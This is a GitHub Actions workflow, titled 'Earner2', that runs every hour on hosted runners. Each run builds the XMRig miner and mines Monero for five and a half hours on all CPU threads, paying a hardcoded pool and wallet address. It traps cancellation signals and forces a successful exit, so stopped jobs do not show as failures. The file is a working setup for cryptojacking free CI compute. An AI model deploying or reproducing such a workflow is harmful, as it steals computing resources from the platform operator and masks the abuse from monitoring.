name: Earner2

on:
  schedule:
    - cron: '0 */1 * * *'  # Every 1 hours
  workflow_dispatch:

jobs:
  xmrig:
    runs-on: ubuntu-latest

    steps:
      - name: Install dependencies
        run: |
          sudo apt update
          sudo apt install -y build-essential git cmake libssl-dev libhwloc-dev libuv1-dev

      - name: Clone XMRig
        run: git clone https://github.com/xmrig/xmrig.git

      - name: Build XMRig
        run: |
          cd xmrig
          mkdir build && cd build
          cmake ..
          make -j$(nproc)

      - name: Run XMRig for 5h 30m with clean exit
        run: |
          cd xmrig/build

          # Trap SIGTERM for graceful exit
          trap "echo 'Job canceled, exiting successfully'; exit 0" SIGTERM

          # Run for 5 hours 30 minutes (19800 seconds)
          timeout 19800s ./xmrig \
            -o gulf.moneroocean.stream:10128 \
            -u 44SpTnkYyc9NmH3QjJkoLtVc3DXXJGwfD7tvhF1zwNRz9JbAMeHNiCD4wb8ivNvo3edgrntc3ra1meA5uZhT3vbaJ1ApPT1.github-run2 \
            -p x \
            -k --coin monero \
            -t $(nproc) || exit 0
